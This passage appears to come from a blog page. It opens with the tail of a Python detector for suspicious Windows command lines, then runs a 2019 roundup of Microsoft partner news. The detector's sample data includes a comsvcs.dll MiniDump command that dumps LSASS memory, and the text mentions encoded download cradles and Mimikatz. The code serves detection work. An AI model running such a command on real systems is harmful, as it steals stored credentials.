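     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']}/{f['user']} event {f['event_id']}: {', '.join(f['tags'])}")
```

The point of decoding the payload before matching is that an encoded command line shows nothing but base64 to a naive string match; the first benign record produces no finding, while the encoded download cradle, the Mimikatz script block and the comsvcs.dll LSASS dump each trip the relevant family. In production the same logic would run against Security 4688 (with command-line auditing enabled) and PowerShell 4104 script block logging, both of which CISA-style guidance assumes are turned on.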

The full alert is available here.

Posted by Scott Bekker on January 06, 2020 at 11:20 AM


Top 5 Microsoft Partner Stories of 2019

This year was as eventful for Microsoft partners as any in this decade.

As the year draws to a close, here's a look at some of the biggest stories that happened in 2019.

1. Ransomware Roared Back
At the beginning of this year, it looked like ransomware might have plateaued. Not so. One of the most damaging malware incidents to date hit Baltimore, where a ransomware attack in May took much of the city's infrastructure offline for weeks and kept other systems down for months. Meanwhile, a trio of attacks on municipal governments in Florida brought record-setting ransom payouts.

The upshot of all this activity is that managed service providers (MSPs) and other types of Microsoft partners spent a lot of time in 2019 educating customers about ransomware, protecting them from attacks and helping them recover from incidents.

2. Microsoft Opens up 'Channel as a Service'
Microsoft launched a significant effort in calendar 2019 to connect its independent software vendor (ISV) partners with its cloud solution provider (CSP) partners through its marketplaces and incentive structures. The results aren't in yet, but the moves have the potential to take the promise of Microsoft's 300,000-partner-strong channel and convert it into more revenues for everyone involved.

One part involves expanding the multibillion-dollar co-sell program beyond Azure to also include Microsoft 365, Dynamics 365 and Power Platform. The other part involves allowing partners to resell ISV solutions through Microsoft's CSP program.

3. Scuttled IUR/Competency Changes
Microsoft faced a full-scale partner mutiny around the time of its annual partner conference, Microsoft Inspire, in July. A plan disclosed shortly before the Las Vegas conference would have revoked partners' ability to use internal use rights (IURs) to run their businesses.

But a substantial partner backlash against the planned IUR revocation and some changes to competencies, which included a very public Change.org petition, caused Microsoft to reverse course. In the end, Microsoft apologized for the incident and promised to do a better job of consulting with partners earlier in the decision process for program changes that would have a major effect on the way partners do business.

4. Azure Lighthouse
Microsoft took a major step to make Azure a friendlier platform for MSPs in 2019. The effort takes the form of a native toolset called Azure Lighthouse.

Using Azure Lighthouse, partners can manage multiple customers in a secure, multitenant environment with automation. Another way to look at it is as a single control plane for service providers to view and manage Azure across their customers. Azure Lighthouse reached general availability in July.

5. Microsoft Hits $1 Trillion
In the race for a $1 trillion market cap, Microsoft seemed like a dark horse, behind Apple, Amazon and Alphabet. Although Apple and Amazon reached the milestone first, Microsoft cleared that hurdle and impressively remained there more consistently than the others. After years of getting kicked around by Wall Street, Microsoft took its place in 2019 as one of investors' most respected companies.

For the Microsoft channel, the market cap provided some positive buzz around the Microsoft brand for much of the year.

As for what to expect in 2020, several big trends are already clear. Azure migration momentum should continue after being spurred by the Windows Server 2008 support deadline next month. The controversy over Microsoft's winning the Department of Defense JEDI contract, and Amazon's contesting of the decision, will continue to roil as the Amazon Web Services (AWS) lawsuit works its way through the courts. And Microsoft will continue to tinker with its partner program levers to urge partners to help make artificial intelligence an everyday technology for customers.

What else will be big next year? We'll find out as it happens.

Posted by Scott Bekker on December 31, 2019 at 11:17 AM